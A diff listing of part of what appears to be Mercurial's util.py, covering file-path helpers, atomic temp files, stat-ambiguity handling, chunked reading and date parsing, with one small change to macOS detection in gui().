1550 '''Check path ends with os.sep or os.altsep.'''
1551 return (path.endswith(pycompat.ossep)
1551 return (path.endswith(pycompat.ossep)
1552 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1552 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1553
1553
1554 def splitpath(path):
1554 def splitpath(path):
1555 '''Split path by os.sep.
1555 '''Split path by os.sep.
1556 Note that this function does not use os.altsep because this is
1556 Note that this function does not use os.altsep because this is
1557 an alternative of simple "xxx.split(os.sep)".
1557 an alternative of simple "xxx.split(os.sep)".
1558 It is recommended to use os.path.normpath() before using this
1558 It is recommended to use os.path.normpath() before using this
1559 function if need.'''
1559 function if need.'''
1560 return path.split(pycompat.ossep)
1560 return path.split(pycompat.ossep)
1561
1561
1562 def gui():
1562 def gui():
1563 '''Are we running in a GUI?'''
1563 '''Are we running in a GUI?'''
1564 if pycompat.sysplatform == 'darwin':
1564 if pycompat.isdarwin:
1565 if 'SSH_CONNECTION' in encoding.environ:
1565 if 'SSH_CONNECTION' in encoding.environ:
1566 # handle SSH access to a box where the user is logged in
1566 # handle SSH access to a box where the user is logged in
1567 return False
1567 return False
1568 elif getattr(osutil, 'isgui', None):
1568 elif getattr(osutil, 'isgui', None):
1569 # check if a CoreGraphics session is available
1569 # check if a CoreGraphics session is available
1570 return osutil.isgui()
1570 return osutil.isgui()
1571 else:
1571 else:
1572 # pure build; use a safe default
1572 # pure build; use a safe default
1573 return True
1573 return True
1574 else:
1574 else:
1575 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1575 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1576
1576
1577 def mktempcopy(name, emptyok=False, createmode=None):
1577 def mktempcopy(name, emptyok=False, createmode=None):
1578 """Create a temporary file with the same contents from name
1578 """Create a temporary file with the same contents from name
1579
1579
1580 The permission bits are copied from the original file.
1580 The permission bits are copied from the original file.
1581
1581
1582 If the temporary file is going to be truncated immediately, you
1582 If the temporary file is going to be truncated immediately, you
1583 can use emptyok=True as an optimization.
1583 can use emptyok=True as an optimization.
1584
1584
1585 Returns the name of the temporary file.
1585 Returns the name of the temporary file.
1586 """
1586 """
1587 d, fn = os.path.split(name)
1587 d, fn = os.path.split(name)
1588 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1588 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1589 os.close(fd)
1589 os.close(fd)
1590 # Temporary files are created with mode 0600, which is usually not
1590 # Temporary files are created with mode 0600, which is usually not
1591 # what we want. If the original file already exists, just copy
1591 # what we want. If the original file already exists, just copy
1592 # its mode. Otherwise, manually obey umask.
1592 # its mode. Otherwise, manually obey umask.
1593 copymode(name, temp, createmode)
1593 copymode(name, temp, createmode)
1594 if emptyok:
1594 if emptyok:
1595 return temp
1595 return temp
1596 try:
1596 try:
1597 try:
1597 try:
1598 ifp = posixfile(name, "rb")
1598 ifp = posixfile(name, "rb")
1599 except IOError as inst:
1599 except IOError as inst:
1600 if inst.errno == errno.ENOENT:
1600 if inst.errno == errno.ENOENT:
1601 return temp
1601 return temp
1602 if not getattr(inst, 'filename', None):
1602 if not getattr(inst, 'filename', None):
1603 inst.filename = name
1603 inst.filename = name
1604 raise
1604 raise
1605 ofp = posixfile(temp, "wb")
1605 ofp = posixfile(temp, "wb")
1606 for chunk in filechunkiter(ifp):
1606 for chunk in filechunkiter(ifp):
1607 ofp.write(chunk)
1607 ofp.write(chunk)
1608 ifp.close()
1608 ifp.close()
1609 ofp.close()
1609 ofp.close()
1610 except: # re-raises
1610 except: # re-raises
1611 try:
1611 try:
1612 os.unlink(temp)
1612 os.unlink(temp)
1613 except OSError:
1613 except OSError:
1614 pass
1614 pass
1615 raise
1615 raise
1616 return temp
1616 return temp
1617
1617
1618 class filestat(object):
1618 class filestat(object):
1619 """help to exactly detect change of a file
1619 """help to exactly detect change of a file
1620
1620
1621 'stat' attribute is result of 'os.stat()' if specified 'path'
1621 'stat' attribute is result of 'os.stat()' if specified 'path'
1622 exists. Otherwise, it is None. This can avoid preparative
1622 exists. Otherwise, it is None. This can avoid preparative
1623 'exists()' examination on client side of this class.
1623 'exists()' examination on client side of this class.
1624 """
1624 """
1625 def __init__(self, stat):
1625 def __init__(self, stat):
1626 self.stat = stat
1626 self.stat = stat
1627
1627
1628 @classmethod
1628 @classmethod
1629 def frompath(cls, path):
1629 def frompath(cls, path):
1630 try:
1630 try:
1631 stat = os.stat(path)
1631 stat = os.stat(path)
1632 except OSError as err:
1632 except OSError as err:
1633 if err.errno != errno.ENOENT:
1633 if err.errno != errno.ENOENT:
1634 raise
1634 raise
1635 stat = None
1635 stat = None
1636 return cls(stat)
1636 return cls(stat)
1637
1637
1638 @classmethod
1638 @classmethod
1639 def fromfp(cls, fp):
1639 def fromfp(cls, fp):
1640 stat = os.fstat(fp.fileno())
1640 stat = os.fstat(fp.fileno())
1641 return cls(stat)
1641 return cls(stat)
1642
1642
1643 __hash__ = object.__hash__
1643 __hash__ = object.__hash__
1644
1644
1645 def __eq__(self, old):
1645 def __eq__(self, old):
1646 try:
1646 try:
1647 # if ambiguity between stat of new and old file is
1647 # if ambiguity between stat of new and old file is
1648 # avoided, comparison of size, ctime and mtime is enough
1648 # avoided, comparison of size, ctime and mtime is enough
1649 # to exactly detect change of a file regardless of platform
1649 # to exactly detect change of a file regardless of platform
1650 return (self.stat.st_size == old.stat.st_size and
1650 return (self.stat.st_size == old.stat.st_size and
1651 self.stat.st_ctime == old.stat.st_ctime and
1651 self.stat.st_ctime == old.stat.st_ctime and
1652 self.stat.st_mtime == old.stat.st_mtime)
1652 self.stat.st_mtime == old.stat.st_mtime)
1653 except AttributeError:
1653 except AttributeError:
1654 pass
1654 pass
1655 try:
1655 try:
1656 return self.stat is None and old.stat is None
1656 return self.stat is None and old.stat is None
1657 except AttributeError:
1657 except AttributeError:
1658 return False
1658 return False
1659
1659
1660 def isambig(self, old):
1660 def isambig(self, old):
1661 """Examine whether new (= self) stat is ambiguous against old one
1661 """Examine whether new (= self) stat is ambiguous against old one
1662
1662
1663 "S[N]" below means stat of a file at N-th change:
1663 "S[N]" below means stat of a file at N-th change:
1664
1664
1665 - S[n-1].ctime < S[n].ctime: can detect change of a file
1665 - S[n-1].ctime < S[n].ctime: can detect change of a file
1666 - S[n-1].ctime == S[n].ctime
1666 - S[n-1].ctime == S[n].ctime
1667 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1667 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1668 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1668 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1669 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1669 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1670 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1670 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1671
1671
1672 Case (*2) above means that a file was changed twice or more at
1672 Case (*2) above means that a file was changed twice or more at
1673 same time in sec (= S[n-1].ctime), and comparison of timestamp
1673 same time in sec (= S[n-1].ctime), and comparison of timestamp
1674 is ambiguous.
1674 is ambiguous.
1675
1675
1676 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1676 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1677 timestamp is ambiguous".
1677 timestamp is ambiguous".
1678
1678
1679 But advancing mtime only in case (*2) doesn't work as
1679 But advancing mtime only in case (*2) doesn't work as
1680 expected, because naturally advanced S[n].mtime in case (*1)
1680 expected, because naturally advanced S[n].mtime in case (*1)
1681 might be equal to manually advanced S[n-1 or earlier].mtime.
1681 might be equal to manually advanced S[n-1 or earlier].mtime.
1682
1682
1683 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1683 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1684 treated as ambiguous regardless of mtime, to avoid overlooking
1684 treated as ambiguous regardless of mtime, to avoid overlooking
1685 by confliction between such mtime.
1685 by confliction between such mtime.
1686
1686
1687 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1687 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1688 S[n].mtime", even if size of a file isn't changed.
1688 S[n].mtime", even if size of a file isn't changed.
1689 """
1689 """
1690 try:
1690 try:
1691 return (self.stat.st_ctime == old.stat.st_ctime)
1691 return (self.stat.st_ctime == old.stat.st_ctime)
1692 except AttributeError:
1692 except AttributeError:
1693 return False
1693 return False
1694
1694
1695 def avoidambig(self, path, old):
1695 def avoidambig(self, path, old):
1696 """Change file stat of specified path to avoid ambiguity
1696 """Change file stat of specified path to avoid ambiguity
1697
1697
1698 'old' should be previous filestat of 'path'.
1698 'old' should be previous filestat of 'path'.
1699
1699
1700 This skips avoiding ambiguity, if a process doesn't have
1700 This skips avoiding ambiguity, if a process doesn't have
1701 appropriate privileges for 'path'. This returns False in this
1701 appropriate privileges for 'path'. This returns False in this
1702 case.
1702 case.
1703
1703
1704 Otherwise, this returns True, as "ambiguity is avoided".
1704 Otherwise, this returns True, as "ambiguity is avoided".
1705 """
1705 """
1706 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1706 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1707 try:
1707 try:
1708 os.utime(path, (advanced, advanced))
1708 os.utime(path, (advanced, advanced))
1709 except OSError as inst:
1709 except OSError as inst:
1710 if inst.errno == errno.EPERM:
1710 if inst.errno == errno.EPERM:
1711 # utime() on the file created by another user causes EPERM,
1711 # utime() on the file created by another user causes EPERM,
1712 # if a process doesn't have appropriate privileges
1712 # if a process doesn't have appropriate privileges
1713 return False
1713 return False
1714 raise
1714 raise
1715 return True
1715 return True
1716
1716
1717 def __ne__(self, other):
1717 def __ne__(self, other):
1718 return not self == other
1718 return not self == other
1719
1719
1720 class atomictempfile(object):
1720 class atomictempfile(object):
1721 '''writable file object that atomically updates a file
1721 '''writable file object that atomically updates a file
1722
1722
1723 All writes will go to a temporary copy of the original file. Call
1723 All writes will go to a temporary copy of the original file. Call
1724 close() when you are done writing, and atomictempfile will rename
1724 close() when you are done writing, and atomictempfile will rename
1725 the temporary copy to the original name, making the changes
1725 the temporary copy to the original name, making the changes
1726 visible. If the object is destroyed without being closed, all your
1726 visible. If the object is destroyed without being closed, all your
1727 writes are discarded.
1727 writes are discarded.
1728
1728
1729 checkambig argument of constructor is used with filestat, and is
1729 checkambig argument of constructor is used with filestat, and is
1730 useful only if target file is guarded by any lock (e.g. repo.lock
1730 useful only if target file is guarded by any lock (e.g. repo.lock
1731 or repo.wlock).
1731 or repo.wlock).
1732 '''
1732 '''
1733 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1733 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1734 self.__name = name # permanent name
1734 self.__name = name # permanent name
1735 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1735 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1736 createmode=createmode)
1736 createmode=createmode)
1737 self._fp = posixfile(self._tempname, mode)
1737 self._fp = posixfile(self._tempname, mode)
1738 self._checkambig = checkambig
1738 self._checkambig = checkambig
1739
1739
1740 # delegated methods
1740 # delegated methods
1741 self.read = self._fp.read
1741 self.read = self._fp.read
1742 self.write = self._fp.write
1742 self.write = self._fp.write
1743 self.seek = self._fp.seek
1743 self.seek = self._fp.seek
1744 self.tell = self._fp.tell
1744 self.tell = self._fp.tell
1745 self.fileno = self._fp.fileno
1745 self.fileno = self._fp.fileno
1746
1746
1747 def close(self):
1747 def close(self):
1748 if not self._fp.closed:
1748 if not self._fp.closed:
1749 self._fp.close()
1749 self._fp.close()
1750 filename = localpath(self.__name)
1750 filename = localpath(self.__name)
1751 oldstat = self._checkambig and filestat.frompath(filename)
1751 oldstat = self._checkambig and filestat.frompath(filename)
1752 if oldstat and oldstat.stat:
1752 if oldstat and oldstat.stat:
1753 rename(self._tempname, filename)
1753 rename(self._tempname, filename)
1754 newstat = filestat.frompath(filename)
1754 newstat = filestat.frompath(filename)
1755 if newstat.isambig(oldstat):
1755 if newstat.isambig(oldstat):
1756 # stat of changed file is ambiguous to original one
1756 # stat of changed file is ambiguous to original one
1757 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1757 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1758 os.utime(filename, (advanced, advanced))
1758 os.utime(filename, (advanced, advanced))
1759 else:
1759 else:
1760 rename(self._tempname, filename)
1760 rename(self._tempname, filename)
1761
1761
1762 def discard(self):
1762 def discard(self):
1763 if not self._fp.closed:
1763 if not self._fp.closed:
1764 try:
1764 try:
1765 os.unlink(self._tempname)
1765 os.unlink(self._tempname)
1766 except OSError:
1766 except OSError:
1767 pass
1767 pass
1768 self._fp.close()
1768 self._fp.close()
1769
1769
1770 def __del__(self):
1770 def __del__(self):
1771 if safehasattr(self, '_fp'): # constructor actually did something
1771 if safehasattr(self, '_fp'): # constructor actually did something
1772 self.discard()
1772 self.discard()
1773
1773
1774 def __enter__(self):
1774 def __enter__(self):
1775 return self
1775 return self
1776
1776
1777 def __exit__(self, exctype, excvalue, traceback):
1777 def __exit__(self, exctype, excvalue, traceback):
1778 if exctype is not None:
1778 if exctype is not None:
1779 self.discard()
1779 self.discard()
1780 else:
1780 else:
1781 self.close()
1781 self.close()
1782
1782
1783 def unlinkpath(f, ignoremissing=False):
1783 def unlinkpath(f, ignoremissing=False):
1784 """unlink and remove the directory if it is empty"""
1784 """unlink and remove the directory if it is empty"""
1785 if ignoremissing:
1785 if ignoremissing:
1786 tryunlink(f)
1786 tryunlink(f)
1787 else:
1787 else:
1788 unlink(f)
1788 unlink(f)
1789 # try removing directories that might now be empty
1789 # try removing directories that might now be empty
1790 try:
1790 try:
1791 removedirs(os.path.dirname(f))
1791 removedirs(os.path.dirname(f))
1792 except OSError:
1792 except OSError:
1793 pass
1793 pass
1794
1794
1795 def tryunlink(f):
1795 def tryunlink(f):
1796 """Attempt to remove a file, ignoring ENOENT errors."""
1796 """Attempt to remove a file, ignoring ENOENT errors."""
1797 try:
1797 try:
1798 unlink(f)
1798 unlink(f)
1799 except OSError as e:
1799 except OSError as e:
1800 if e.errno != errno.ENOENT:
1800 if e.errno != errno.ENOENT:
1801 raise
1801 raise
1802
1802
1803 def makedirs(name, mode=None, notindexed=False):
1803 def makedirs(name, mode=None, notindexed=False):
1804 """recursive directory creation with parent mode inheritance
1804 """recursive directory creation with parent mode inheritance
1805
1805
1806 Newly created directories are marked as "not to be indexed by
1806 Newly created directories are marked as "not to be indexed by
1807 the content indexing service", if ``notindexed`` is specified
1807 the content indexing service", if ``notindexed`` is specified
1808 for "write" mode access.
1808 for "write" mode access.
1809 """
1809 """
1810 try:
1810 try:
1811 makedir(name, notindexed)
1811 makedir(name, notindexed)
1812 except OSError as err:
1812 except OSError as err:
1813 if err.errno == errno.EEXIST:
1813 if err.errno == errno.EEXIST:
1814 return
1814 return
1815 if err.errno != errno.ENOENT or not name:
1815 if err.errno != errno.ENOENT or not name:
1816 raise
1816 raise
1817 parent = os.path.dirname(os.path.abspath(name))
1817 parent = os.path.dirname(os.path.abspath(name))
1818 if parent == name:
1818 if parent == name:
1819 raise
1819 raise
1820 makedirs(parent, mode, notindexed)
1820 makedirs(parent, mode, notindexed)
1821 try:
1821 try:
1822 makedir(name, notindexed)
1822 makedir(name, notindexed)
1823 except OSError as err:
1823 except OSError as err:
1824 # Catch EEXIST to handle races
1824 # Catch EEXIST to handle races
1825 if err.errno == errno.EEXIST:
1825 if err.errno == errno.EEXIST:
1826 return
1826 return
1827 raise
1827 raise
1828 if mode is not None:
1828 if mode is not None:
1829 os.chmod(name, mode)
1829 os.chmod(name, mode)
1830
1830
1831 def readfile(path):
1831 def readfile(path):
1832 with open(path, 'rb') as fp:
1832 with open(path, 'rb') as fp:
1833 return fp.read()
1833 return fp.read()
1834
1834
1835 def writefile(path, text):
1835 def writefile(path, text):
1836 with open(path, 'wb') as fp:
1836 with open(path, 'wb') as fp:
1837 fp.write(text)
1837 fp.write(text)
1838
1838
1839 def appendfile(path, text):
1839 def appendfile(path, text):
1840 with open(path, 'ab') as fp:
1840 with open(path, 'ab') as fp:
1841 fp.write(text)
1841 fp.write(text)
1842
1842
1843 class chunkbuffer(object):
1843 class chunkbuffer(object):
1844 """Allow arbitrary sized chunks of data to be efficiently read from an
1844 """Allow arbitrary sized chunks of data to be efficiently read from an
1845 iterator over chunks of arbitrary size."""
1845 iterator over chunks of arbitrary size."""
1846
1846
1847 def __init__(self, in_iter):
1847 def __init__(self, in_iter):
1848 """in_iter is the iterator that's iterating over the input chunks."""
1848 """in_iter is the iterator that's iterating over the input chunks."""
1849 def splitbig(chunks):
1849 def splitbig(chunks):
1850 for chunk in chunks:
1850 for chunk in chunks:
1851 if len(chunk) > 2**20:
1851 if len(chunk) > 2**20:
1852 pos = 0
1852 pos = 0
1853 while pos < len(chunk):
1853 while pos < len(chunk):
1854 end = pos + 2 ** 18
1854 end = pos + 2 ** 18
1855 yield chunk[pos:end]
1855 yield chunk[pos:end]
1856 pos = end
1856 pos = end
1857 else:
1857 else:
1858 yield chunk
1858 yield chunk
1859 self.iter = splitbig(in_iter)
1859 self.iter = splitbig(in_iter)
1860 self._queue = collections.deque()
1860 self._queue = collections.deque()
1861 self._chunkoffset = 0
1861 self._chunkoffset = 0
1862
1862
1863 def read(self, l=None):
1863 def read(self, l=None):
1864 """Read L bytes of data from the iterator of chunks of data.
1864 """Read L bytes of data from the iterator of chunks of data.
1865 Returns less than L bytes if the iterator runs dry.
1865 Returns less than L bytes if the iterator runs dry.
1866
1866
1867 If size parameter is omitted, read everything"""
1867 If size parameter is omitted, read everything"""
1868 if l is None:
1868 if l is None:
1869 return ''.join(self.iter)
1869 return ''.join(self.iter)
1870
1870
1871 left = l
1871 left = l
1872 buf = []
1872 buf = []
1873 queue = self._queue
1873 queue = self._queue
1874 while left > 0:
1874 while left > 0:
1875 # refill the queue
1875 # refill the queue
1876 if not queue:
1876 if not queue:
1877 target = 2**18
1877 target = 2**18
1878 for chunk in self.iter:
1878 for chunk in self.iter:
1879 queue.append(chunk)
1879 queue.append(chunk)
1880 target -= len(chunk)
1880 target -= len(chunk)
1881 if target <= 0:
1881 if target <= 0:
1882 break
1882 break
1883 if not queue:
1883 if not queue:
1884 break
1884 break
1885
1885
1886 # The easy way to do this would be to queue.popleft(), modify the
1886 # The easy way to do this would be to queue.popleft(), modify the
1887 # chunk (if necessary), then queue.appendleft(). However, for cases
1887 # chunk (if necessary), then queue.appendleft(). However, for cases
1888 # where we read partial chunk content, this incurs 2 dequeue
1888 # where we read partial chunk content, this incurs 2 dequeue
1889 # mutations and creates a new str for the remaining chunk in the
1889 # mutations and creates a new str for the remaining chunk in the
1890 # queue. Our code below avoids this overhead.
1890 # queue. Our code below avoids this overhead.
1891
1891
1892 chunk = queue[0]
1892 chunk = queue[0]
1893 chunkl = len(chunk)
1893 chunkl = len(chunk)
1894 offset = self._chunkoffset
1894 offset = self._chunkoffset
1895
1895
1896 # Use full chunk.
1896 # Use full chunk.
1897 if offset == 0 and left >= chunkl:
1897 if offset == 0 and left >= chunkl:
1898 left -= chunkl
1898 left -= chunkl
1899 queue.popleft()
1899 queue.popleft()
1900 buf.append(chunk)
1900 buf.append(chunk)
1901 # self._chunkoffset remains at 0.
1901 # self._chunkoffset remains at 0.
1902 continue
1902 continue
1903
1903
1904 chunkremaining = chunkl - offset
1904 chunkremaining = chunkl - offset
1905
1905
1906 # Use all of unconsumed part of chunk.
1906 # Use all of unconsumed part of chunk.
1907 if left >= chunkremaining:
1907 if left >= chunkremaining:
1908 left -= chunkremaining
1908 left -= chunkremaining
1909 queue.popleft()
1909 queue.popleft()
1910 # offset == 0 is enabled by block above, so this won't merely
1910 # offset == 0 is enabled by block above, so this won't merely
1911 # copy via ``chunk[0:]``.
1911 # copy via ``chunk[0:]``.
1912 buf.append(chunk[offset:])
1912 buf.append(chunk[offset:])
1913 self._chunkoffset = 0
1913 self._chunkoffset = 0
1914
1914
1915 # Partial chunk needed.
1915 # Partial chunk needed.
1916 else:
1916 else:
1917 buf.append(chunk[offset:offset + left])
1917 buf.append(chunk[offset:offset + left])
1918 self._chunkoffset += left
1918 self._chunkoffset += left
1919 left -= chunkremaining
1919 left -= chunkremaining
1920
1920
1921 return ''.join(buf)
1921 return ''.join(buf)
1922
1922
1923 def filechunkiter(f, size=131072, limit=None):
1923 def filechunkiter(f, size=131072, limit=None):
1924 """Create a generator that produces the data in the file size
1924 """Create a generator that produces the data in the file size
1925 (default 131072) bytes at a time, up to optional limit (default is
1925 (default 131072) bytes at a time, up to optional limit (default is
1926 to read all data). Chunks may be less than size bytes if the
1926 to read all data). Chunks may be less than size bytes if the
1927 chunk is the last chunk in the file, or the file is a socket or
1927 chunk is the last chunk in the file, or the file is a socket or
1928 some other type of file that sometimes reads less data than is
1928 some other type of file that sometimes reads less data than is
1929 requested."""
1929 requested."""
1930 assert size >= 0
1930 assert size >= 0
1931 assert limit is None or limit >= 0
1931 assert limit is None or limit >= 0
1932 while True:
1932 while True:
1933 if limit is None:
1933 if limit is None:
1934 nbytes = size
1934 nbytes = size
1935 else:
1935 else:
1936 nbytes = min(limit, size)
1936 nbytes = min(limit, size)
1937 s = nbytes and f.read(nbytes)
1937 s = nbytes and f.read(nbytes)
1938 if not s:
1938 if not s:
1939 break
1939 break
1940 if limit:
1940 if limit:
1941 limit -= len(s)
1941 limit -= len(s)
1942 yield s
1942 yield s
1943
1943
1944 def makedate(timestamp=None):
1944 def makedate(timestamp=None):
1945 '''Return a unix timestamp (or the current time) as a (unixtime,
1945 '''Return a unix timestamp (or the current time) as a (unixtime,
1946 offset) tuple based off the local timezone.'''
1946 offset) tuple based off the local timezone.'''
1947 if timestamp is None:
1947 if timestamp is None:
1948 timestamp = time.time()
1948 timestamp = time.time()
1949 if timestamp < 0:
1949 if timestamp < 0:
1950 hint = _("check your clock")
1950 hint = _("check your clock")
1951 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1951 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1952 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1952 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1953 datetime.datetime.fromtimestamp(timestamp))
1953 datetime.datetime.fromtimestamp(timestamp))
1954 tz = delta.days * 86400 + delta.seconds
1954 tz = delta.days * 86400 + delta.seconds
1955 return timestamp, tz
1955 return timestamp, tz
1956
1956
1957 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1957 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1958 """represent a (unixtime, offset) tuple as a localized time.
1958 """represent a (unixtime, offset) tuple as a localized time.
1959 unixtime is seconds since the epoch, and offset is the time zone's
1959 unixtime is seconds since the epoch, and offset is the time zone's
1960 number of seconds away from UTC.
1960 number of seconds away from UTC.
1961
1961
1962 >>> datestr((0, 0))
1962 >>> datestr((0, 0))
1963 'Thu Jan 01 00:00:00 1970 +0000'
1963 'Thu Jan 01 00:00:00 1970 +0000'
1964 >>> datestr((42, 0))
1964 >>> datestr((42, 0))
1965 'Thu Jan 01 00:00:42 1970 +0000'
1965 'Thu Jan 01 00:00:42 1970 +0000'
1966 >>> datestr((-42, 0))
1966 >>> datestr((-42, 0))
1967 'Wed Dec 31 23:59:18 1969 +0000'
1967 'Wed Dec 31 23:59:18 1969 +0000'
1968 >>> datestr((0x7fffffff, 0))
1968 >>> datestr((0x7fffffff, 0))
1969 'Tue Jan 19 03:14:07 2038 +0000'
1969 'Tue Jan 19 03:14:07 2038 +0000'
1970 >>> datestr((-0x80000000, 0))
1970 >>> datestr((-0x80000000, 0))
1971 'Fri Dec 13 20:45:52 1901 +0000'
1971 'Fri Dec 13 20:45:52 1901 +0000'
1972 """
1972 """
1973 t, tz = date or makedate()
1973 t, tz = date or makedate()
1974 if "%1" in format or "%2" in format or "%z" in format:
1974 if "%1" in format or "%2" in format or "%z" in format:
1975 sign = (tz > 0) and "-" or "+"
1975 sign = (tz > 0) and "-" or "+"
1976 minutes = abs(tz) // 60
1976 minutes = abs(tz) // 60
1977 q, r = divmod(minutes, 60)
1977 q, r = divmod(minutes, 60)
1978 format = format.replace("%z", "%1%2")
1978 format = format.replace("%z", "%1%2")
1979 format = format.replace("%1", "%c%02d" % (sign, q))
1979 format = format.replace("%1", "%c%02d" % (sign, q))
1980 format = format.replace("%2", "%02d" % r)
1980 format = format.replace("%2", "%02d" % r)
1981 d = t - tz
1981 d = t - tz
1982 if d > 0x7fffffff:
1982 if d > 0x7fffffff:
1983 d = 0x7fffffff
1983 d = 0x7fffffff
1984 elif d < -0x80000000:
1984 elif d < -0x80000000:
1985 d = -0x80000000
1985 d = -0x80000000
1986 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1986 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1987 # because they use the gmtime() system call which is buggy on Windows
1987 # because they use the gmtime() system call which is buggy on Windows
1988 # for negative values.
1988 # for negative values.
1989 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1989 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1990 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1990 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1991 return s
1991 return s
1992
1992
1993 def shortdate(date=None):
1993 def shortdate(date=None):
1994 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1994 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1995 return datestr(date, format='%Y-%m-%d')
1995 return datestr(date, format='%Y-%m-%d')
1996
1996
1997 def parsetimezone(s):
1997 def parsetimezone(s):
1998 """find a trailing timezone, if any, in string, and return a
1998 """find a trailing timezone, if any, in string, and return a
1999 (offset, remainder) pair"""
1999 (offset, remainder) pair"""
2000
2000
2001 if s.endswith("GMT") or s.endswith("UTC"):
2001 if s.endswith("GMT") or s.endswith("UTC"):
2002 return 0, s[:-3].rstrip()
2002 return 0, s[:-3].rstrip()
2003
2003
2004 # Unix-style timezones [+-]hhmm
2004 # Unix-style timezones [+-]hhmm
2005 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2005 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2006 sign = (s[-5] == "+") and 1 or -1
2006 sign = (s[-5] == "+") and 1 or -1
2007 hours = int(s[-4:-2])
2007 hours = int(s[-4:-2])
2008 minutes = int(s[-2:])
2008 minutes = int(s[-2:])
2009 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2009 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2010
2010
2011 # ISO8601 trailing Z
2011 # ISO8601 trailing Z
2012 if s.endswith("Z") and s[-2:-1].isdigit():
2012 if s.endswith("Z") and s[-2:-1].isdigit():
2013 return 0, s[:-1]
2013 return 0, s[:-1]
2014
2014
2015 # ISO8601-style [+-]hh:mm
2015 # ISO8601-style [+-]hh:mm
2016 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2016 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2017 s[-5:-3].isdigit() and s[-2:].isdigit()):
2017 s[-5:-3].isdigit() and s[-2:].isdigit()):
2018 sign = (s[-6] == "+") and 1 or -1
2018 sign = (s[-6] == "+") and 1 or -1
2019 hours = int(s[-5:-3])
2019 hours = int(s[-5:-3])
2020 minutes = int(s[-2:])
2020 minutes = int(s[-2:])
2021 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2021 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2022
2022
2023 return None, s
2023 return None, s
2024
2024
2025 def strdate(string, format, defaults=None):
2025 def strdate(string, format, defaults=None):
2026 """parse a localized time string and return a (unixtime, offset) tuple.
2026 """parse a localized time string and return a (unixtime, offset) tuple.
2027 if the string cannot be parsed, ValueError is raised."""
2027 if the string cannot be parsed, ValueError is raised."""
2028 if defaults is None:
2028 if defaults is None:
2029 defaults = {}
2029 defaults = {}
2030
2030
2031 # NOTE: unixtime = localunixtime + offset
2031 # NOTE: unixtime = localunixtime + offset
2032 offset, date = parsetimezone(string)
2032 offset, date = parsetimezone(string)
2033
2033
2034 # add missing elements from defaults
2034 # add missing elements from defaults
2035 usenow = False # default to using biased defaults
2035 usenow = False # default to using biased defaults
2036 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2036 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2037 part = pycompat.bytestr(part)
2037 part = pycompat.bytestr(part)
2038 found = [True for p in part if ("%"+p) in format]
2038 found = [True for p in part if ("%"+p) in format]
2039 if not found:
2039 if not found:
2040 date += "@" + defaults[part][usenow]
2040 date += "@" + defaults[part][usenow]
2041 format += "@%" + part[0]
2041 format += "@%" + part[0]
2042 else:
2042 else:
2043 # We've found a specific time element, less specific time
2043 # We've found a specific time element, less specific time
2044 # elements are relative to today
2044 # elements are relative to today
2045 usenow = True
2045 usenow = True
2046
2046
2047 timetuple = time.strptime(encoding.strfromlocal(date),
2047 timetuple = time.strptime(encoding.strfromlocal(date),
2048 encoding.strfromlocal(format))
2048 encoding.strfromlocal(format))
2049 localunixtime = int(calendar.timegm(timetuple))
2049 localunixtime = int(calendar.timegm(timetuple))
2050 if offset is None:
2050 if offset is None:
2051 # local timezone
2051 # local timezone
2052 unixtime = int(time.mktime(timetuple))
2052 unixtime = int(time.mktime(timetuple))
2053 offset = unixtime - localunixtime
2053 offset = unixtime - localunixtime
2054 else:
2054 else:
2055 unixtime = localunixtime + offset
2055 unixtime = localunixtime + offset
2056 return unixtime, offset
2056 return unixtime, offset
2057
